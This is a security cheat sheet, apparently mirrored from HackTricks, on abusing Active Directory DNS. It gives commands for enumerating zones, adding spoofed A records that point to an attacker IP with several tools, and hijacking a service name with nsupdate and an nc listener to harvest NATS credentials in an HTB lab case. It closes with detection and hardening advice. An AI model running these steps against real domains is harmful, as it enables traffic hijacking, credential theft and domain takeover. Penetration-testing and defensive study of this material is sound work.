daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-dns-records.md (7578B)


      1 ---
      2 title: "AD DNS Records"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/ad-dns-records.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/ad-dns-records.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # AD DNS Records
     14 
     15 By default **any user** in Active Directory can **enumerate all DNS records** in the Domain or Forest DNS zones, similar to a zone transfer (users can list the child objects of a DNS zone in an AD environment).
     16 
     17 The tool [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) enables **enumeration** and **exporting** of **all DNS records** in the zone for recon purposes of internal networks.<sup>[[4]](#references)</sup>
     18 
     19 ```bash
     20 git clone https://github.com/dirkjanm/adidnsdump
     21 cd adidnsdump
     22 pip install .
     23 
     24 # Enumerate the default zone and resolve the "hidden" records
     25 adidnsdump -u domain_name\\username ldap://10.10.10.10 -r
     26 
     27 # Quickly list every zone (DomainDnsZones, ForestDnsZones, legacy zones,…)
     28 adidnsdump -u domain_name\\username ldap://10.10.10.10 --print-zones
     29 
     30 # Dump a specific zone (e.g. ForestDnsZones)
     31 adidnsdump -u domain_name\\username ldap://10.10.10.10 --zone _msdcs.domain.local -r
     32 
     33 cat records.csv
     34 ```
     35 
     36 >  adidnsdump v1.4.0 (April 2025) adds JSON/Greppable (`--json`) output, multi-threaded DNS resolution and support for TLS 1.2/1.3 when binding to LDAPS  
     37 
     38 For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)<sup>[[4]](#references)</sup>
     39 
     40 ---
     41 
     42 ## Creating / Modifying records (ADIDNS spoofing)
     43 
     44 Because the **Authenticated Users** group has **Create Child** on the zone DACL by default, any domain account (or computer account) can register additional records.  This can be used for traffic hijacking, NTLM relay coercion or even full domain compromise.
     45 
     46 ### PowerMad / Invoke-DNSUpdate (PowerShell)
     47 
     48 ```powershell
     49 Import-Module .\Powermad.ps1
     50 
     51 # Add A record evil.domain.local → attacker IP
     52 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Verbose
     53 
     54 # Delete it when done
     55 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Delete -Verbose
     56 ```
     57 
     58 ### Impacket – dnsupdate.py  (Python)
     59 
     60 ```bash
     61 # add/replace an A record via secure dynamic-update
     62 python3 dnsupdate.py -u 'DOMAIN/user:Passw0rd!' -dc-ip 10.10.10.10 -action add -record evil.domain.local -type A -data 10.10.14.37
     63 ```
     64 
     65 *(dnsupdate.py ships with Impacket ≥0.12.0)*
     66 
     67 ### BloodyAD
     68 
     69 ```bash
     70 bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.14.37
     71 ```
     72 
     73 ---
     74 
     75 ## Common attack primitives
     76 
     77 1. **Wildcard record** – `*.<zone>` turns the AD DNS server into an enterprise-wide responder similar to LLMNR/NBNS spoofing. It can be abused to capture NTLM hashes or to relay them to LDAP/SMB.  (Requires WINS-lookup to be disabled.)<sup>[[1]](#references)</sup>    
     78 2. **WPAD hijack** – add `wpad` (or an **NS** record pointing to an attacker host to bypass the Global-Query-Block-List) and transparently proxy outbound HTTP requests to harvest credentials.  Microsoft patched the wildcard/ DNAME bypasses (CVE-2018-8320) but **NS-records still work**.<sup>[[1]](#references)</sup>    
     79 3. **Stale entry takeover** – claim the IP address that previously belonged to a workstation and the associated DNS entry will still resolve, enabling resource-based constrained delegation or Shadow-Credentials attacks without touching DNS at all.    
     80 4. **DHCP → DNS spoofing** – on a default Windows DHCP+DNS deployment an unauthenticated attacker on the same subnet can overwrite any existing A record (including Domain Controllers) by sending forged DHCP requests that trigger dynamic DNS updates (Akamai “DDSpoof”, 2023).  This gives machine-in-the-middle over Kerberos/LDAP and can lead to full domain takeover.<sup>[[2]](#references)</sup>    
     81 5. **Certifried (CVE-2022-26923)** – change the `dNSHostName` of a machine account you control, register a matching A record, then request a certificate for that name to impersonate the DC. Tools such as **Certipy** or **BloodyAD** fully automate the flow.  
     82 
     83 ---
     84 
     85 ### Internal service hijacking via stale dynamic records (NATS case study)
     86 
     87 When dynamic updates stay open to all authenticated users, **a de-registered service name can be re-claimed and pointed to attacker infrastructure**. The Mirage HTB DC exposed the hostname `nats-svc.mirage.htb` after DNS scavenging, so any low-privileged user could:<sup>[[3]](#references)</sup>
     88 
     89 1. **Confirm the record is missing** and learn the SOA with `dig`:
     90 
     91 ```bash
     92 dig @dc01.mirage.htb nats-svc.mirage.htb
     93 ```
     94 
     95 2. **Re-create the record** toward an external/VPN interface they control:
     96 
     97 ```bash
     98 nsupdate
     99 > server 10.10.11.78
    100 > update add nats-svc.mirage.htb 300 A 10.10.14.2
    101 > send
    102 ```
    103 
    104 3. **Impersonate the plaintext service**. NATS clients expect to see one `INFO { ... }` banner before they send credentials, so copying a legitimate banner from the real broker is enough to harvest secrets:
    105 
    106 ```bash
    107 # Capture a single INFO line from the real service and replay it to victims
    108 nc 10.10.11.78 4222 | head -1 | nc -lnvp 4222
    109 ```
    110 
    111 Any client that resolves the hijacked name will immediately leak its JSON `CONNECT` frame (including `"user"`/`"pass"`) to the listener. Running the official `nats-server -V` binary on the attacker host, disabling its log redaction, or just sniffing the session with Wireshark yields the same plaintext credentials because TLS was optional.
    112 
    113 4. **Pivot with the captured creds** – in Mirage the stolen NATS account provided JetStream access, which exposed historic authentication events containing reusable AD usernames/passwords.
    114 
    115 This pattern applies to every AD-integrated service that relies on unsecured TCP handshakes (HTTP APIs, RPC, MQTT, etc.): once the DNS record is hijacked, the attacker becomes the service.
    116 
    117 ---
    118 
    119 ## Detection & hardening
    120 
    121 * Deny **Authenticated Users** the *Create all child objects* right on sensitive zones and delegate dynamic updates to a dedicated account used by DHCP.
    122 * If dynamic updates are required, set the zone to **Secure-only** and enable **Name Protection** in DHCP so that only the owner computer object can overwrite its own record.
    123 * Monitor DNS Server event IDs 257/252 (dynamic update), 770 (zone transfer) and LDAP writes to `CN=MicrosoftDNS,DC=DomainDnsZones`.
    124 * Block dangerous names (`wpad`, `isatap`, `*`) with an intentionally-benign record or via the Global Query Block List.
    125 * Keep DNS servers patched – e.g., RCE bugs CVE-2024-26224 and CVE-2024-26231 reached **CVSS 9.8** and are remotely exploitable against Domain Controllers.  
    126 
    127 ## References
    128 
    129 - [1] [ADIDNS Revisited - WPAD, GQBL, and More](https://www.netspi.com/blog/technical-blog/network-pentesting/adidns-revisited/) (2018, still the de-facto reference for wildcard/WPAD attacks)
    130 - [2] [Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates](https://www.akamai.com/blog/security-research/spoofing-dns-by-abusing-dhcp) (Dec 2023)
    131 - [3] [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html)
    132 - [4] [Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)